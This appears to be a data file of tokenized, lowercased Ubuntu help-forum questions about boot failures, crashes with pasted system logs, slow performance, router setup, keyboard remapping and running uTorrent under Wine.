300144	ca n't boot galaxy s i9000 into recovery mode to install ubuntu	i believe my volume up button is not working on my galaxy s i9000 , and i 'm trying to get it into recovery mode . right now the phone is bricked , so i can still get it into download mode . so at the moment i have cwm on it , though that seems pretty useless if i ca n't get the phone into recovery mode . how in the world can i get the phone to boot into recovery mode ?
300147	how can i troubleshoot why ubuntu keeps crashing on my laptop ?	i have a one year old acer aspire 4752g netbook running kubuntu 12.04 lts with all the latest distribution updates installed . it was previously running great until about a week ago when it suddenly started crashing repeatedly . previously , on the rare occasion that it froze completely , even though i could n't ctrl+alt+f1 to a console , the alt+sysrq+r ( eisub ) was able to close everything down relatively gracefully and restart , but now , even att+sysrq does nothing when it freezes . the last crash occurred at around 10:40am today ( may 26 ) ( log time ) . how can a i begin troubleshooting this ? these are the higlights i 've identified from various logs . dmesg.log [ 0.069749 ] cpu0 : intel ( r ) core ( tm ) i3-2350m cpu @ 2.30ghz stepping 07 [ 0.176277 ] performance events : pebs fmt1+ , sandybridge events , intel pmu driver . [ 0.176282 ] pebs disabled due to cpu errata . [ 0.176285 ] ... version : 3 [ 0.176286 ] ... bit width : 48 [ 0.176287 ] ... generic registers : 4 [ 0.176289 ] ... value mask : 0000ffffffffffff [ 0.176290 ] ... max period : 000000007fffffff [ 0.176291 ] ... fixed-purpose events : 3 [ 0.176293 ] ... event mask : 000000070000000f [ 0.729751 ] hest : table not found . [ 0.729754 ] pci : using host bridge windows from acpi ; if necessary , use `` pci=nocrs '' and report a bug [ 0.730025 ] \_sb_.pci0 : _osc invalid uuid [ 0.903601 ] acpi : deprecated procfs i/f for battery is loaded , please retry with config_acpi_procfs_power cleared [ 3.152702 ] acpi warning : for \_sb_.pci0.peg0.pegp._dod : return type mismatch - found integer , expected package ( 20110623/nspredef-1060 ) [ 3.152702 ] acpi warning : for \_sb_.pci0.peg0.pegp._dod : return type mismatch - found integer , expected package ( 20110623/nspredef-1060 ) [ 3.152709 ] acpi exception : ae_ok , invalid _dod data ( 20110623/video-1175 ) [ 3.155864 ] acpi device:2f : registered as cooling_device4 [ 27.635581 ] wl : module license 'mixed/proprietary ' taints kernel . [ 27.635587 ] disabling lock debugging due to kernel taint [ 27.928424 ] input : acer wmi hotkeys as /devices/virtual/input/input7 [ 27.929470 ] acer_wmi : get 0x1 device status failed : 0xe2 - 0x0 [ 27.929796 ] acer_wmi : get 0x800 device status failed : 0xe2 - 0x0 [ 27.930105 ] acer_wmi : get current device status failed : 0xe2 - 0x0 [ 28.496068 ] acer_wmi : get current device status failed : 0xe2 - 0x0 the following are errors from syslog : may 25 12:52:28 peter-aspire-ubuntu kernel : [ 4428.392128 ] [ drm : gen6_sanitize_pm ] *error* power management discrepancy : gen6_rp_interrupt_limits expected 17000000 , was 12060000 may 25 13:03:26 peter-aspire-ubuntu kernel : [ 0.000000 ] acpi : irq0 used by override . may 25 13:03:26 peter-aspire-ubuntu kernel : [ 0.000000 ] acpi : irq2 used by override . may 25 13:03:26 peter-aspire-ubuntu kernel : [ 0.000000 ] acpi : irq9 used by override . may 25 13:03:26 peter-aspire-ubuntu kernel : [ 0.176282 ] pebs disabled due to cpu errata . may 25 13:03:26 peter-aspire-ubuntu kernel : [ 0.724077 ] acpi : using ioapic for interrupt routing may 25 13:03:26 peter-aspire-ubuntu kernel : [ 0.764035 ] acpi : pci interrupt routing table [ \_sb_.pci0._prt ] may 25 13:03:26 peter-aspire-ubuntu kernel : [ 0.764194 ] acpi : pci interrupt routing table [ \_sb_.pci0.rp01._prt ] may 25 13:03:26 peter-aspire-ubuntu kernel : [ 0.764230 ] acpi : pci interrupt routing table [ \_sb_.pci0.rp02._prt ] may 25 13:03:26 peter-aspire-ubuntu kernel : [ 0.764267 ] acpi : pci interrupt routing table [ \_sb_.pci0.rp04._prt ] may 25 13:03:26 peter-aspire-ubuntu kernel : [ 0.764302 ] acpi : pci interrupt routing table [ \_sb_.pci0.rp05._prt ] may 25 13:03:26 peter-aspire-ubuntu kernel : [ 0.764352 ] acpi : pci interrupt routing table [ \_sb_.pci0.peg0._prt ] may 25 13:03:26 peter-aspire-ubuntu kernel : [ 0.764491 ] pci0000:00 : acpi _osc request failed ( ae_error ) , returned control mask : 0x1d may 25 13:03:26 peter-aspire-ubuntu kernel : [ 0.768055 ] acpi : pci interrupt link [ lnka ] ( irqs 1 3 4 5 6 10 *11 12 14 15 ) may 25 13:03:26 peter-aspire-ubuntu kernel : [ 0.768106 ] acpi : pci interrupt link [ lnkb ] ( irqs 1 3 4 5 6 *10 11 12 14 15 ) may 25 13:03:26 peter-aspire-ubuntu kernel : [ 0.768152 ] acpi : pci interrupt link [ lnkc ] ( irqs 1 3 4 5 6 10 *11 12 14 15 ) may 25 13:03:26 peter-aspire-ubuntu kernel : [ 0.768198 ] acpi : pci interrupt link [ lnkd ] ( irqs 1 3 4 5 6 10 11 12 14 15 ) *9 may 25 13:03:26 peter-aspire-ubuntu kernel : [ 0.768244 ] acpi : pci interrupt link [ lnke ] ( irqs 1 3 4 5 6 *10 11 12 14 15 ) may 25 13:03:26 peter-aspire-ubuntu kernel : [ 0.768290 ] acpi : pci interrupt link [ lnkf ] ( irqs 1 3 4 5 6 10 11 12 14 15 ) *0 , disabled . may 25 13:03:26 peter-aspire-ubuntu kernel : [ 0.768336 ] acpi : pci interrupt link [ lnkg ] ( irqs 1 3 4 5 6 10 11 12 14 15 ) *9 may 25 13:03:26 peter-aspire-ubuntu kernel : [ 0.768381 ] acpi : pci interrupt link [ lnkh ] ( irqs 1 3 4 5 6 10 *11 12 14 15 ) may 25 13:03:26 peter-aspire-ubuntu kernel : [ 2.448807 ] sdhci : copyright ( c ) pierre ossman may 25 13:03:26 peter-aspire-ubuntu kernel : [ 2.491866 ] [ drm : intel_dsm_platform_mux_info ] *error* mux info call failed may 25 13:03:26 peter-aspire-ubuntu kernel : [ 2.492008 ] [ drm : intel_dsm_platform_mux_info ] *error* mux info call failed may 25 13:03:26 peter-aspire-ubuntu kernel : [ 2.492040 ] vgaarb : transferring owner from pci:0000:00:02.0 to pci:0000:01:00.0 may 25 13:03:26 peter-aspire-ubuntu kernel : [ 46.041131 ] ext4-fs ( sda2 ) : re-mounted . opts : errors=remount-ro may 25 13:03:26 peter-aspire-ubuntu kernel : [ 47.639516 ] [ drm : gen6_sanitize_pm ] *error* power management discrepancy : gen6_rp_interrupt_limits expected 17000000 , was 12060000 may 25 13:03:59 peter-aspire-ubuntu kernel : [ 80.776471 ] [ drm : gen6_sanitize_pm ] *error* power management discrepancy : gen6_rp_interrupt_limits expected 170d0000 , was 17000000 may 25 13:04:01 peter-aspire-ubuntu kernel : [ 83.296159 ] error @ wl_cfg80211_get_station : could not get rate ( -1 ) may 25 13:04:01 peter-aspire-ubuntu kernel : [ 83.296164 ] error @ wl_cfg80211_get_station : could not get rssi ( -1 ) may 25 13:04:06 peter-aspire-ubuntu kernel : [ 87.515557 ] error @ wl_cfg80211_get_station : could not get rate ( -1 ) may 25 13:04:06 peter-aspire-ubuntu kernel : [ 87.515562 ] error @ wl_cfg80211_get_station : could not get rssi ( -1 ) may 25 13:04:19 peter-aspire-ubuntu kernel : [ 101.423633 ] error @ wl_cfg80211_get_station : could not get rate ( -1 ) may 25 13:04:19 peter-aspire-ubuntu kernel : [ 101.423642 ] error @ wl_cfg80211_get_station : could not get rssi ( -1 ) may 26 10:18:55 peter-aspire-ubuntu kernel : [ 957.882861 ] [ drm : gen6_sanitize_pm ] *error* power management discrepancy : gen6_rp_interrupt_limits expected 17000000 , was 12060000 may 26 10:39:04 peter-aspire-ubuntu kernel : [ 0.000000 ] acpi : irq0 used by override . may 26 10:39:04 peter-aspire-ubuntu kernel : [ 0.000000 ] acpi : irq2 used by override . may 26 10:39:04 peter-aspire-ubuntu kernel : [ 0.000000 ] acpi : irq9 used by override . may 26 10:39:04 peter-aspire-ubuntu kernel : [ 0.176282 ] pebs disabled due to cpu errata . may 26 10:39:04 peter-aspire-ubuntu kernel : [ 0.724054 ] acpi : using ioapic for interrupt routing may 26 10:39:04 peter-aspire-ubuntu kernel : [ 0.764011 ] acpi : pci interrupt routing table [ \_sb_.pci0._prt ] may 26 10:39:04 peter-aspire-ubuntu kernel : [ 0.764169 ] acpi : pci interrupt routing table [ \_sb_.pci0.rp01._prt ] may 26 10:39:04 peter-aspire-ubuntu kernel : [ 0.764205 ] acpi : pci interrupt routing table [ \_sb_.pci0.rp02._prt ] may 26 10:39:04 peter-aspire-ubuntu kernel : [ 0.764242 ] acpi : pci interrupt routing table [ \_sb_.pci0.rp04._prt ] may 26 10:39:04 peter-aspire-ubuntu kernel : [ 0.764277 ] acpi : pci interrupt routing table [ \_sb_.pci0.rp05._prt ] may 26 10:39:04 peter-aspire-ubuntu kernel : [ 0.764328 ] acpi : pci interrupt routing table [ \_sb_.pci0.peg0._prt ] may 26 10:39:04 peter-aspire-ubuntu kernel : [ 0.764468 ] pci0000:00 : acpi _osc request failed ( ae_error ) , returned control mask : 0x1d may 26 10:39:04 peter-aspire-ubuntu kernel : [ 0.768030 ] acpi : pci interrupt link [ lnka ] ( irqs 1 3 4 5 6 10 *11 12 14 15 ) may 26 10:39:04 peter-aspire-ubuntu kernel : [ 0.768081 ] acpi : pci interrupt link [ lnkb ] ( irqs 1 3 4 5 6 *10 11 12 14 15 ) may 26 10:39:04 peter-aspire-ubuntu kernel : [ 0.768128 ] acpi : pci interrupt link [ lnkc ] ( irqs 1 3 4 5 6 10 *11 12 14 15 ) may 26 10:39:04 peter-aspire-ubuntu kernel : [ 0.768173 ] acpi : pci interrupt link [ lnkd ] ( irqs 1 3 4 5 6 10 11 12 14 15 ) *9 may 26 10:39:04 peter-aspire-ubuntu kernel : [ 0.768219 ] acpi : pci interrupt link [ lnke ] ( irqs 1 3 4 5 6 *10 11 12 14 15 ) may 26 10:39:04 peter-aspire-ubuntu kernel : [ 0.768265 ] acpi : pci interrupt link [ lnkf ] ( irqs 1 3 4 5 6 10 11 12 14 15 ) *0 , disabled . may 26 10:39:04 peter-aspire-ubuntu kernel : [ 0.768311 ] acpi : pci interrupt link [ lnkg ] ( irqs 1 3 4 5 6 10 11 12 14 15 ) *9 may 26 10:39:04 peter-aspire-ubuntu kernel : [ 0.768356 ] acpi : pci interrupt link [ lnkh ] ( irqs 1 3 4 5 6 10 *11 12 14 15 ) may 26 10:39:04 peter-aspire-ubuntu kernel : [ 2.442088 ] sdhci : copyright ( c ) pierre ossman may 26 10:39:04 peter-aspire-ubuntu kernel : [ 2.486544 ] [ drm : intel_dsm_platform_mux_info ] *error* mux info call failed may 26 10:39:04 peter-aspire-ubuntu kernel : [ 2.486672 ] [ drm : intel_dsm_platform_mux_info ] *error* mux info call failed may 26 10:39:04 peter-aspire-ubuntu kernel : [ 2.486706 ] vgaarb : transferring owner from pci:0000:00:02.0 to pci:0000:01:00.0 may 26 10:39:04 peter-aspire-ubuntu kernel : [ 28.088312 ] ext4-fs ( sda2 ) : re-mounted . opts : errors=remount-ro may 26 10:39:05 peter-aspire-ubuntu kernel : [ 29.920716 ] [ drm : gen6_sanitize_pm ] *error* power management discrepancy : gen6_rp_interrupt_limits expected 17000000 , was 12060000 may 26 10:39:37 peter-aspire-ubuntu kernel : [ 64.561699 ] [ drm : gen6_sanitize_pm ] *error* power management discrepancy : gen6_rp_interrupt_limits expected 170d0000 , was 17000000 may 26 10:39:39 peter-aspire-ubuntu kernel : [ 66.278736 ] error @ wl_cfg80211_get_station : could not get rate ( -1 ) may 26 10:39:39 peter-aspire-ubuntu kernel : [ 66.278741 ] error @ wl_cfg80211_get_station : could not get rssi ( -1 ) may 26 10:39:45 peter-aspire-ubuntu kernel : [ 71.865569 ] error @ wl_cfg80211_get_station : could not get rate ( -1 ) may 26 10:39:45 peter-aspire-ubuntu kernel : [ 71.865585 ] error @ wl_cfg80211_get_station : could not get rssi ( -1 ) may 26 10:39:56 peter-aspire-ubuntu kernel : [ 83.772522 ] error @ wl_cfg80211_get_station : could not get rate ( -1 ) may 26 10:39:56 peter-aspire-ubuntu kernel : [ 83.772528 ] error @ wl_cfg80211_get_station : could not get rssi ( -1 ) may 26 10:40:11 peter-aspire-ubuntu kernel : [ 98.378664 ] [ drm : gen6_sanitize_pm ] *error* power management discrepancy : gen6_rp_interrupt_limits expected 000d0000 , was 170d0000 in bootstrap.log : gpgv : signature made mon apr 23 11:18:22 2012 utc using dsa key id 437d05b5 gpgv : good signature from `` ubuntu archive automatic signing key < ftpmaster @ ubuntu.com > '' gpgv : signature made mon apr 23 11:18:22 2012 utc using dsa key id 437d05b5 gpgv : good signature from `` ubuntu archive automatic signing key < ftpmaster @ ubuntu.com > '' dpkg : warning : parsing file '/var/lib/dpkg/status ' near line 4 package 'dpkg ' : missing description dpkg : warning : parsing file '/var/lib/dpkg/status ' near line 4 package 'dpkg ' : missing maintainer dpkg : warning : parsing file '/var/lib/dpkg/status ' near line 4 package 'dpkg ' : missing architecture selecting previously unselected package base-files . dpkg : regarding ... /base-files_6.5ubuntu6_i386.deb containing base-files , pre-dependency problem : base-files pre-depends on awk awk is not installed . dpkg : warning : ignoring pre-dependency problem ! ( reading database ... 0 files and directories currently installed . ) unpacking base-files ( from ... /base-files_6.5ubuntu6_i386.deb ) ... selecting previously unselected package base-passwd . unpacking base-passwd ( from ... /base-passwd_3.5.24_i386.deb ) ... dpkg : base-passwd : dependency problems , but configuring anyway as you requested : base-passwd depends on libc6 ( > = 2.8 ) ; however : package libc6 is not installed . setting up base-passwd ( 3.5.24 ) ... dpkg : base-files : dependency problems , but configuring anyway as you requested : base-files depends on awk ; however : package awk is not installed . setting up base-files ( 6.5ubuntu6 ) ... dpkg : warning : parsing file '/var/lib/dpkg/status ' near line 53 package 'dpkg ' : missing description dpkg : warning : parsing file '/var/lib/dpkg/status ' near line 53 package 'dpkg ' : missing maintainer dpkg : warning : parsing file '/var/lib/dpkg/status ' near line 53 package 'dpkg ' : missing architecture dpkg : regarding ... /dpkg_1.16.1.2ubuntu7_i386.deb containing dpkg , pre-dependency problem : dpkg pre-depends on libbz2-1.0 libbz2-1.0 is not installed . dpkg : warning : ignoring pre-dependency problem ! dpkg : regarding ... /dpkg_1.16.1.2ubuntu7_i386.deb containing dpkg , pre-dependency problem : dpkg pre-depends on libc6 ( > = 2.11 ) dpkg : warning : ignoring pre-dependency problem ! dpkg : regarding ... /dpkg_1.16.1.2ubuntu7_i386.deb containing dpkg , pre-dependency problem : dpkg pre-depends on libselinux1 ( > = 1.32 ) dpkg : warning : ignoring pre-dependency problem ! dpkg : regarding ... /dpkg_1.16.1.2ubuntu7_i386.deb containing dpkg , pre-dependency problem : dpkg pre-depends on zlib1g ( > = 1:1.1.4 ) dpkg : warning : ignoring pre-dependency problem ! dpkg : regarding ... /dpkg_1.16.1.2ubuntu7_i386.deb containing dpkg , pre-dependency problem : dpkg pre-depends on coreutils ( > = 5.93-1 ) dpkg : warning : ignoring pre-dependency problem ! dpkg : regarding ... /dpkg_1.16.1.2ubuntu7_i386.deb containing dpkg , pre-dependency problem : dpkg pre-depends on tar ( > = 1.23 ) dpkg : warning : ignoring pre-dependency problem ! dpkg : regarding ... /dpkg_1.16.1.2ubuntu7_i386.deb containing dpkg , pre-dependency problem : dpkg pre-depends on xz-utils xz-utils is not installed . dpkg : warning : ignoring pre-dependency problem ! ( reading database ... 117 files and directories currently installed . ) preparing to replace dpkg 1.16.1.2ubuntu7 ( using ... /dpkg_1.16.1.2ubuntu7_i386.deb ) ... unpacking replacement dpkg ... dpkg : dpkg : dependency problems , but configuring anyway as you requested : dpkg depends on libbz2-1.0 ; however : package libbz2-1.0 is not installed . dpkg depends on libc6 ( > = 2.11 ) ; however : package libc6 is not installed . dpkg depends on libselinux1 ( > = 1.32 ) ; however : package libselinux1 is not installed . dpkg depends on zlib1g ( > = 1:1.1.4 ) ; however : package zlib1g is not installed . dpkg depends on coreutils ( > = 5.93-1 ) ; however : package coreutils is not installed . dpkg depends on tar ( > = 1.23 ) ; however : package tar is not installed . dpkg depends on xz-utils ; however : package xz-utils is not installed . setting up dpkg ( 1.16.1.2ubuntu7 ) ... selecting previously unselected package libc6 . ( reading database ... 357 files and directories currently installed . ) unpacking libc6 ( from ... /libc6_2.15-0ubuntu10_i386.deb ) ... dpkg : libc6 : dependency problems , but configuring anyway as you requested : libc6 depends on libc-bin ( = 2.15-0ubuntu10 ) ; however : package libc-bin is not installed . libc6 depends on libgcc1 ; however : package libgcc1 is not installed . libc6 depends on tzdata ; however : package tzdata is not installed . setting up libc6 ( 2.15-0ubuntu10 ) ... selecting previously unselected package perl-base . ( reading database ... 671 files and directories currently installed . ) unpacking perl-base ( from ... /perl-base_5.14.2-6ubuntu2_i386.deb ) ... setting up perl-base ( 5.14.2-6ubuntu2 ) ... selecting previously unselected package mawk . ( reading database ... 1739 files and directories currently installed . ) unpacking mawk ( from ... /mawk_1.3.3-17_i386.deb ) ... setting up mawk ( 1.3.3-17 ) ... selecting previously unselected package debconf . ( reading database ... 1757 files and directories currently installed . ) unpacking debconf ( from ... /debconf_1.5.42ubuntu1_all.deb ) ... setting up debconf ( 1.5.42ubuntu1 ) ... selecting previously unselected package adduser . ( reading database ... 1937 files and directories currently installed . ) unpacking adduser ( from ... /adduser_3.113ubuntu2_all.deb ) ... preparing to replace base-files 6.5ubuntu6 ( using ... /base-files_6.5ubuntu6_i386.deb ) ... unpacking replacement base-files ... preparing to replace base-passwd 3.5.24 ( using ... /base-passwd_3.5.24_i386.deb ) ... unpacking replacement base-passwd ... selecting previously unselected package bash . dpkg : regarding ... /bash_4.2-2ubuntu2_i386.deb containing bash , pre-dependency problem : bash pre-depends on dash ( > = 0.5.5.1-2.2 ) dpkg : warning : ignoring pre-dependency problem ! dpkg : regarding ... /bash_4.2-2ubuntu2_i386.deb containing bash , pre-dependency problem : bash pre-depends on libtinfo5 libtinfo5 is not installed . dpkg : warning : ignoring pre-dependency problem ! unpacking bash ( from ... /bash_4.2-2ubuntu2_i386.deb ) ... selecting previously unselected package bsdutils . unpacking bsdutils ( from ... /bsdutils_1 % 3a2.20.1-1ubuntu3_i386.deb ) ... selecting previously unselected package busybox-initramfs . unpacking busybox-initramfs ( from ... /busybox-initramfs_1 % 3a1.18.5-1ubuntu4_i386.deb ) ... selecting previously unselected package coreutils . dpkg : regarding ... /coreutils_8.13-3ubuntu3_i386.deb containing coreutils , pre-dependency problem : coreutils pre-depends on libacl1 ( > = 2.2.51-5 ) dpkg : warning : ignoring pre-dependency problem ! dpkg : regarding ... /coreutils_8.13-3ubuntu3_i386.deb containing coreutils , pre-dependency problem : coreutils pre-depends on libattr1 ( > = 1:2.4.46-5 ) dpkg : warning : ignoring pre-dependency problem ! dpkg : regarding ... /coreutils_8.13-3ubuntu3_i386.deb containing coreutils , pre-dependency problem : coreutils pre-depends on libselinux1 ( > = 1.32 ) dpkg : warning : ignoring pre-dependency problem ! unpacking coreutils ( from ... /coreutils_8.13-3ubuntu3_i386.deb ) ... selecting previously unselected package cpio . unpacking cpio ( from ... /cpio_2.11-7ubuntu3_i386.deb ) ... selecting previously unselected package dash . unpacking dash ( from ... /dash_0.5.7-2ubuntu2_i386.deb ) ... adding 'diversion of /bin/sh to /bin/sh.distrib by dash' adding 'diversion of /usr/share/man/man1/sh.1.gz to /usr/share/man/man1/sh.distrib.1.gz by dash' preparing to replace debconf 1.5.42ubuntu1 ( using ... /debconf_1.5.42ubuntu1_all.deb ) ... unpacking replacement debconf ... selecting previously unselected package debianutils . unpacking debianutils ( from ... /debianutils_4.2.1ubuntu2_i386.deb ) ... selecting previously unselected package diffutils . unpacking diffutils ( from ... /diffutils_1 % 3a3.2-1ubuntu1_i386.deb ) ... dpkg : regarding ... /dpkg_1.16.1.2ubuntu7_i386.deb containing dpkg , pre-dependency problem : dpkg pre-depends on libbz2-1.0 libbz2-1.0 is not installed . dpkg : warning : ignoring pre-dependency problem ! dpkg : regarding ... /dpkg_1.16.1.2ubuntu7_i386.deb containing dpkg , pre-dependency problem : dpkg pre-depends on libselinux1 ( > = 1.32 ) dpkg : warning : ignoring pre-dependency problem ! dpkg : regarding ... /dpkg_1.16.1.2ubuntu7_i386.deb containing dpkg , pre-dependency problem : dpkg pre-depends on zlib1g ( > = 1:1.1.4 ) dpkg : warning : ignoring pre-dependency problem ! dpkg : regarding ... /dpkg_1.16.1.2ubuntu7_i386.deb containing dpkg , pre-dependency problem : dpkg pre-depends on coreutils ( > = 5.93-1 ) coreutils is unpacked , but has never been configured . dpkg : warning : ignoring pre-dependency problem ! dpkg : regarding ... /dpkg_1.16.1.2ubuntu7_i386.deb containing dpkg , pre-dependency problem : zlib1g pre-depends on multiarch-support multiarch-support is unpacked , but has never been configured . dpkg : warning : ignoring pre-dependency problem ! gpg : /etc/apt/trustdb.gpg : trustdb created gpg : key 437d05b5 : public key `` ubuntu archive automatic signing key < ftpmaster @ ubuntu.com > '' imported gpg : key fbb75451 : public key `` ubuntu cd image automatic signing key < cdimage @ ubuntu.com > '' imported gpg : total number processed : 2 gpg : imported : 2 gpg : no ultimately trusted keys found kdm.log : ( process:1369 ) : gconf-warning ** : client failed to connect to the d-bus daemon : address does not contain a colon qgtkstyle was unable to detect the current gtk+ theme . klauncher ( 1617 ) kdemain : no dbus session-bus found . check if you have started the dbus server . kdeinit4 : communication error with launcher . exiting ! kdmgreet ( 1369 ) /kdecore ( k*timezone* ) : ksystemtimezones : ktimezoned initialize ( ) d-bus call failed : `` not connected to d-bus server '' kdmgreet ( 1369 ) /kdecore ( k*timezone* ) : no time zone information obtained from ktimezoned qinotifyfilesystemwatcherengine : :addpaths : inotify_add_watch failed : no such file or directory qfilesystemwatcher : failed to add paths : /tmp/1495114011/.config/ibus/bus ( process:1421 ) : gconf-warning ** : client failed to connect to the d-bus daemon : address does not contain a colon qgtkstyle was unable to detect the current gtk+ theme . klauncher ( 1849 ) kdemain : no dbus session-bus found . check if you have started the dbus server . kdeinit4 : communication error with launcher . exiting ! kdmgreet ( 1421 ) /kdecore ( k*timezone* ) : ksystemtimezones : ktimezoned initialize ( ) d-bus call failed : `` not connected to d-bus server '' kdmgreet ( 1421 ) /kdecore ( k*timezone* ) : no time zone information obtained from ktimezoned qinotifyfilesystemwatcherengine : :addpaths : inotify_add_watch failed : no such file or directory qfilesystemwatcher : failed to add paths : /tmp/1970533938/.config/ibus/bus in kern.log ( for today ) this is the only error : may 26 10:40:11 peter-aspire-ubuntu kernel : [ 98.378664 ] [ drm : gen6_sanitize_pm ] *error* power management discrepancy : gen6_rp_interrupt_limits expected 000d0000 , was 170d0000 ( repeated a number of times ) may 26 10:39:45 peter-aspire-ubuntu kernel : [ 71.865585 ] error @ wl_cfg80211_get_station : could not get rssi ( -1 ) ( repeated a number of times ) may 26 10:39:09 peter-aspire-ubuntu kernel : [ 34.528349 ] init : anacron main process ( 1216 ) killed by term signal ( should this be happening ? - since i 'm also aware of an issue with annacron not running some jobs ) may 26 10:39:04 peter-aspire-ubuntu kernel : [ 28.496068 ] acer_wmi : get current device status failed : 0xe2 - 0x0 may 26 10:39:04 peter-aspire-ubuntu kernel : [ 28.058858 ] bluetooth : ca n't load firmware , may not work correctly may 26 10:39:04 peter-aspire-ubuntu kernel : [ 3.152709 ] acpi exception : ae_ok , invalid _dod data ( 20110623/video-1175 ) in xorg.log : [ 29.467 ] ( == ) no layout section . using the first screen section . [ 29.467 ] ( == ) no screen section available . using defaults . [ 29.467 ] ( ** ) | -- > screen `` default screen section '' ( 0 ) [ 29.467 ] ( ** ) | | -- > monitor `` < default monitor > '' [ 29.467 ] ( == ) no device specified for screen `` default screen section '' . using the first device section listed . [ 29.467 ] ( ** ) | | -- > device `` default device '' [ 29.468 ] ( == ) no monitor specified for screen `` default screen section '' . using a default monitor configuration . [ 29.468 ] ( ww ) the directory `` /usr/share/fonts/x11/cyrillic '' does not exist . [ 29.468 ] entry deleted from font path . [ 29.468 ] ( ww ) the directory `` /usr/share/fonts/x11/100dpi/ '' does not exist . [ 29.468 ] entry deleted from font path . [ 29.468 ] ( ww ) the directory `` /usr/share/fonts/x11/75dpi/ '' does not exist . [ 29.468 ] entry deleted from font path . [ 29.468 ] ( ww ) the directory `` /usr/share/fonts/x11/100dpi '' does not exist . [ 29.468 ] entry deleted from font path . [ 29.468 ] ( ww ) the directory `` /usr/share/fonts/x11/75dpi '' does not exist . [ 29.468 ] entry deleted from font path . [ 29.468 ] ( ww ) the directory `` /var/lib/defoma/x-ttcidfont-conf.d/dirs/truetype '' does not exist . [ 29.468 ] entry deleted from font path . [ 29.716 ] ( ii ) intel ( 0 ) : manufacturer : lgd model : 2f8 serial # : 0 [ 29.716 ] ( ii ) intel ( 0 ) : year : 2010 week : 0 [ 29.716 ] ( ii ) intel ( 0 ) : edid version : 1.3 [ 29.716 ] ( ii ) intel ( 0 ) : digital display input [ 29.716 ] ( ii ) intel ( 0 ) : max image size [ cm ] : horiz . : 31 vert . : 17 [ 29.716 ] ( ii ) intel ( 0 ) : gamma : 2.20 [ 29.716 ] ( ii ) intel ( 0 ) : no dpms capabilities specified [ 29.716 ] ( ii ) intel ( 0 ) : not using default mode `` 320x240 '' ( doublescan mode not supported ) [ 29.716 ] ( ii ) intel ( 0 ) : not using default mode `` 400x300 '' ( doublescan mode not supported ) [ 29.716 ] ( ii ) intel ( 0 ) : not using default mode `` 400x300 '' ( doublescan mode not supported ) [ 29.716 ] ( ii ) intel ( 0 ) : not using default mode `` 512x384 '' ( doublescan mode not supported ) [ 29.716 ] ( ii ) intel ( 0 ) : not using default mode `` 640x480 '' ( doublescan mode not supported ) [ 29.716 ] ( ii ) intel ( 0 ) : not using default mode `` 640x512 '' ( doublescan mode not supported ) [ 29.716 ] ( ii ) intel ( 0 ) : not using default mode `` 800x600 '' ( doublescan mode not supported ) [ 29.716 ] ( ii ) intel ( 0 ) : not using default mode `` 896x672 '' ( doublescan mode not supported ) [ 29.716 ] ( ii ) intel ( 0 ) : not using default mode `` 928x696 '' ( doublescan mode not supported ) [ 29.716 ] ( ii ) intel ( 0 ) : not using default mode `` 960x720 '' ( doublescan mode not supported ) [ 29.716 ] ( ii ) intel ( 0 ) : not using default mode `` 576x432 '' ( doublescan mode not supported ) [ 29.716 ] ( ii ) intel ( 0 ) : not using default mode `` 680x384 '' ( doublescan mode not supported ) [ 29.716 ] ( ii ) intel ( 0 ) : not using default mode `` 680x384 '' ( doublescan mode not supported ) [ 29.716 ] ( ii ) intel ( 0 ) : not using default mode `` 700x525 '' ( doublescan mode not supported ) [ 29.716 ] ( ii ) intel ( 0 ) : not using default mode `` 720x450 '' ( doublescan mode not supported ) [ 29.716 ] ( ii ) intel ( 0 ) : not using default mode `` 800x512 '' ( doublescan mode not supported ) [ 29.716 ] ( ii ) intel ( 0 ) : not using default mode `` 840x525 '' ( doublescan mode not supported ) [ 29.716 ] ( ii ) intel ( 0 ) : not using default mode `` 840x525 '' ( doublescan mode not supported ) [ 29.716 ] ( ii ) intel ( 0 ) : not using default mode `` 960x540 '' ( doublescan mode not supported ) [ 29.716 ] ( ii ) intel ( 0 ) : not using default mode `` 960x600 '' ( doublescan mode not supported ) [ 29.716 ] ( ii ) intel ( 0 ) : not using default mode `` 1024x768 '' ( doublescan mode not supported ) if anyone identifies and gives helpful advice which helps to fix other problems identified in the logs , apart from the main problem described , i 'll surely upvote those posts .
300154	after installing ubuntu 13.04 blank screen `` missing operating system ''	i 'm switching back to ubuntu after a long hiatus . i used it for a couple of years in college so i thought i knew what i was doing . however , after burning the 13.04 64 bit iso to a dvd on windows 7 , booting it and following the on screen installation instructions , i am now greeted with a blank screen that only says `` missing operating system '' when i boot up my computer . i checked my boot order and my ssd that 's supposed to have ubuntu on it is first priority . i 've tried reinstalling it a couple times , including one time when i went in manually , selected `` new partition table '' on my ssd , formatted the disk , and then created a swap and root partition , which i installed ubuntu to . i 'm still getting the `` missing operating system '' message . i know the os is on there because when i go into the installer it says that ubuntu is installed . am i missing something ? i also have a second hard drive that just has videos and music on it formatted in ntfs , but i do n't think this has anything to do with it because i made sure the installer only went to work on my ssd . any help would be greatly appreciated , this is my main machine so i want to get it working as soon as possible . thank you in advance . my specs are as follows : - uefi capable asrock p67 extreme4 motherboard - intel core i5 2500k sandy bridge processor - nvidia 580 gtx 3gb - g.skill ripjaws x series 8gb ddr3 1600 ram - crucial m4 128gb ssd - 1tb samsung hdd
300162	how to remapping keyboard ?	i had problem about keyboard . my 's ' button was not working and i want to map 's ' character to another button for use it temporarily . how can i do it ?
300164	performance on laptops running very slow	hi i am running a duel boot win 7 and ubuntu 13 32bit on a hp pavilion i7 1.6ghz cpu and 6 gig ram and ati graphics , i have in the past run other ubuntuâs and even linux operating systems and all of them run very slow . i also have a old siemens laptop with a 1.8 ghz cpu 1gig ram ati graphics and i am running xubuntu 32bit and that to runs very slow , is there any whay someone can help me . i have done all the checks on the swap disk usage ect ...
300166	ubuntu 13.4 starts super-slow ( 90 seconds ) on a 2x 2ghz / 4gb ram laptop	ubuntu needs 90 seconds to start , windows 7 only needs 45 seconds . here is the generated bootchart : click . i hope you can tell me where it wastes it 's time . laptop specifications : 2x 2ghz , 4 gb ram
300167	belkin modem cum router setup on ubuntu 12.10 with bsnl broadband	i have bsnl broadband and i am using belkin f9j1001v1 belkin modem-router . the setup cd that comes with belkin only supports windows and mac . how do i get drivers of it for ubuntu so that i can setup the router and eventually configure it for wifi accessibility ? i tried accessing and configure . the dhcp was detected but internet is never detected . please help if anyone has encountered the same problem .
300189	utorre n't wo n't start with wine	yesterday due to a problem i had , i reinstalled ubuntu.before the reinstall , starting utorrent with wine worked , but now it does n't anymore , i click on the utorrent.exe and nothing happens , it 's like i do n't even click on it.what could be the problem ?
